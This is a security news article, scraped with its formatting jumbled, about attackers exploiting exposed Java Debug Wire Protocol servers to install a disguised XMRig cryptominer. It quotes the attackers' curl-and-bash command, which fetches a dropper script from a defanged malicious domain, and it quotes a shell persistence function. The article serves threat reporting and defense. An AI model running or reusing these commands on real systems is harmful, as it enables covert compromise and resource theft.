A new wave of cyberattacks is targeting organizations that inadvertently expose Java Debug Wire Protocol (JDWP) servers to the internet, with attackers leveraging this overlooked entry point to deploy sophisticated cryptomining malware.<\/p>\n
JDWP, a standard feature in the Java platform, is designed to facilitate remote debugging by allowing developers to inspect live applications.<\/p>\n
However, when JDWP is left accessible on production systems\u2014often due to misconfiguration or the use of development flags in live environments\u2014it becomes a potent vector for remote code execution.<\/p>\n
The emergence of this threat has been marked by rapid exploitation cycles. In several observed incidents, attackers were able to compromise vulnerable machines within hours of exposure.<\/p>\n
The attack flow typically begins with mass internet scans for open JDWP ports, most commonly port 5005. Once a target is identified, the attacker initiates a JDWP handshake to confirm the service is active and then establishes a session, gaining interactive access to the Java Virtual Machine (JVM).<\/p>\n
This access allows the adversary to enumerate loaded classes and invoke methods, ultimately enabling arbitrary command<\/a> execution on the host.<\/p>\n Wiz analysts identified<\/a> this campaign after observing exploitation attempts against their honeypot servers running TeamCity, a popular CI\/CD tool.<\/p>\n The attackers demonstrated a high degree of automation and customization, deploying a modified XMRig cryptominer with a hardcoded configuration to evade detection.<\/p>\n Notably, the malware used mining pool proxies to obscure the destination wallet address, complicating efforts to trace or disrupt the illicit mining operation.<\/p>\n The impact of these attacks is significant. By abusing JDWP, threat actors can not only deploy cryptominers but also establish deep persistence, manipulate system processes, and potentially pivot to other assets within the compromised environment.<\/p>\n The stealthy nature of the payload, combined with its ability to blend in with legitimate system utilities, increases the risk of prolonged undetected activity and resource drain.<\/p>\n Focusing on the infection mechanism, the attackers exploit JDWP\u2019s lack of authentication to inject and execute shell commands directly through the protocol.<\/p>\n After establishing a session, they typically download a dropper script\u2014such as logservice.sh\u2014using commands like:-<\/p>\n This script is engineered to kill competing miners, download the malicious XMRig binary disguised as logrotate, and install it in the user\u2019s configuration directory.<\/p>\n The script then sets up multiple persistence<\/a> mechanisms, including modifying shell startup files, creating cron jobs, and installing a fake system service.<\/p>\n The following excerpt illustrates how the script ensures persistence via shell configuration:-<\/p>\n The infection chain is both efficient and resilient, allowing the cryptominer<\/a> to survive reboots and user logins.<\/p>\n The attackers\u2019 use of legitimate-sounding process names and system locations further complicates detection and remediation efforts, underscoring the need for vigilant configuration management and robust monitoring of exposed services.<\/p>\n Investigate live malware behavior, trace every step of an attack, and make faster, smarter security decisions ->\u00a0Try ANY.RUN now<\/strong><\/a><\/p>\n The post Hackers Exploiting Java Debug Wire Protocol Servers in Wild to Deploy Cryptomining Payload<\/a> appeared first on Cyber Security News<\/a>.<\/p>\n<\/div>\nAttack Flow<\/strong><\/h2>\n
curl -o \/tmp\/logservice.sh -s https:\/\/canonicalconnect[.]com\/logservice.sh\nbash \/tmp\/logservice.sh<\/code><\/pre>\nadd_to_startup() {\n if [ -r \"$1\" ]; then\n if ! grep -Fxq \"$EXEC >\/dev\/null 2>&1\" \"$1\"; then\n echo \"$EXEC >\/dev\/null 2>&1\" >> \"$1\"\n fi\n fi\n}<\/code><\/pre>\n![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgT14bKVkx4CSZmULi919t0jIDSuEhNw-c1AN0BoMk-kECqqEK_UaXse_m3xCX3cguO6cSixUlkAoCv2y1WnjI5JwY4DEyW8rv7n_RZhBXWeDFsDi8IMicfYMhwmooxenVsPtC47VSM39HjrcxII5SvztN3iY0Y-z0i3MQXSk92AZqfxT3M_kw7_jtML7s\/s16000\/Infection%2520chain%2520%28Source%2520-%2520Wiz%29.webp?ssl=1\")